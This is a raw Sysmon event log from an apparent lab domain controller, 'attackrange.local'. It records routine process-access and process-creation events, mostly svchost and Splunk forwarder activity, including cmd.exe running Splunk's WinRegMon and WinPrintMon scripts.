13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.720{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.611{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 